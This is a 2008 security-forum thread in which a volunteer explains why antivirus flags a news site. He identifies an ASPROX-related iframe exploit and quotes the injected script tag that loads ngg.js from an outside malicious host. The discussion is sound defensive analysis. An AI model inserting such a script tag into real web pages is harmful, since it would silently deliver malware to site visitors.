ITWire Infected ???

Discussion in 'malware problems & news' started by dmenace, Jul 14, 2008.

Thread Status:
Not open for further replies.
  1. dmenace

    dmenace Registered Member

    Joined:
    Nov 29, 2006
    Posts:
    275
    See attached screenshot:
     

    Attached Files:

    dmenace, Jul 14, 2008
    #1
  2. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    Well it does have an iframe exploit on that page that KIS is correctly alerting you to. In fact many of the pages at that site have the ngg.js reference in the HTML code.

    There is a script entry that is the trigger for the iframe exploit....

    Exploit.HTML.Iframe.FileDownload.bb (Kaspersky), Troj/Iframe-AG (Sophos),

    {script src=http://www.nopcls.com/ngg.js></script}

    Troj_Iframe_AG.JPG


    ASPROX Payload Morphed NGG.JS

     
    Last edited: Jul 14, 2008
    Bubba, Jul 14, 2008
    #2
  3. dmenace

    dmenace Registered Member

    Joined:
    Nov 29, 2006
    Posts:
    275
    Thanks Bubba - Wow!
     
    dmenace, Jul 15, 2008
    #3
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...